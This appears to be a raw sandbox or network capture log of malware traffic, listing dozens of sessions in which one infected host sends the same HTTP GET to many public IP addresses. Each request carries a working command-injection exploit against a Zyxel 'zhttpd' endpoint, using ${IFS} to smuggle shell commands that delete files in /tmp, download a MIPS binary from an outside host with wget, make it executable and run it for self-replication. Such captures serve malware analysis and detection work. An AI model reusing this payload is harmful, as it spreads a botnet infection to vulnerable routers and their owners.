                                                Jan 12, 2024 18:24:55.339584112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9449192.168.2.1355346188.76.55.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.339616060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9450192.168.2.1348010209.14.59.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.339680910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9451192.168.2.134401668.155.126.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.339720964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9452192.168.2.134157831.211.98.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.339772940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9453192.168.2.135961012.151.168.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.339790106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9454192.168.2.1353496137.56.6.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.339828968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9455192.168.2.1344956110.4.51.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.339863062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9456192.168.2.135859684.227.140.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.339891911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9457192.168.2.134478658.130.233.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.339943886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9458192.168.2.1338474169.48.124.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.339998960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9459192.168.2.1337538217.124.33.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.340030909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9460192.168.2.134962690.188.17.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.340090990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9461192.168.2.1340890153.95.151.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.340117931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9462192.168.2.1350946189.29.228.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.340166092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9463192.168.2.133828254.194.69.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.340229034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9464192.168.2.134369038.35.192.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.340269089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9465192.168.2.1336464207.25.45.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.340312958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9466192.168.2.13536329.221.203.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.340361118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9467192.168.2.13548684.119.227.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.340393066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9468192.168.2.1352550144.220.53.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.340437889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9469192.168.2.1359076199.166.0.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.340477943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9470192.168.2.134769860.14.57.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.340512991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9471192.168.2.1345098141.238.154.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.340549946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9472192.168.2.134144468.8.82.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.340584993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9473192.168.2.134075214.117.233.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.340646029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9474192.168.2.134448417.34.108.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.340694904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9475192.168.2.1334122165.252.53.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.340744972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9476192.168.2.1335552128.227.206.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.340758085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9477192.168.2.134147437.188.244.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.340814114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9478192.168.2.1355050141.26.63.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.340837955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9479192.168.2.1360602195.249.222.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.340863943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9480192.168.2.1349210181.189.162.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.340902090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9481192.168.2.1352800111.188.125.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.340933084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9482192.168.2.134414665.49.94.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.340981960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9483192.168.2.133353845.16.183.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.341017962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9484192.168.2.1348948222.169.54.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.341062069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9485192.168.2.1347324177.90.161.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.341097116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9486192.168.2.1350440155.134.22.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.341135979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9487192.168.2.1360490153.128.64.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.341161966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9488192.168.2.1343934113.159.112.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.341223955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9489192.168.2.133454838.75.83.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.341248035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9490192.168.2.1334924209.32.186.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.341296911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9491192.168.2.1357780169.241.213.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.341360092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9492192.168.2.135311094.182.131.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.341382027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9493192.168.2.133828050.43.38.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.341412067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9494192.168.2.1343406221.212.179.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.341453075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9495192.168.2.1340732142.111.50.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.341507912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9496192.168.2.1339862195.252.72.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.341552019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9497192.168.2.1349780162.207.226.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.341578007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9498192.168.2.1357392108.32.166.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.341633081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9499192.168.2.1341488166.163.121.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.341653109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9500192.168.2.1350632148.95.13.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.341681957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9501192.168.2.135315051.123.193.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.341701031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9502192.168.2.135418485.195.200.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.345735073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9503192.168.2.135263853.101.62.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.345762968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9504192.168.2.1332980206.127.165.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.345792055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9505192.168.2.1343878207.197.42.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.345818996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9506192.168.2.133446834.231.190.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.345876932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9507192.168.2.135597641.50.183.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.345926046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9508192.168.2.1332834162.16.180.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.345978022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9509192.168.2.1344726137.16.143.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.345999002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9510192.168.2.136040612.65.48.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.346069098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9511192.168.2.1342664152.8.2.58443
                                                TimestampBytes transferredDirectionData
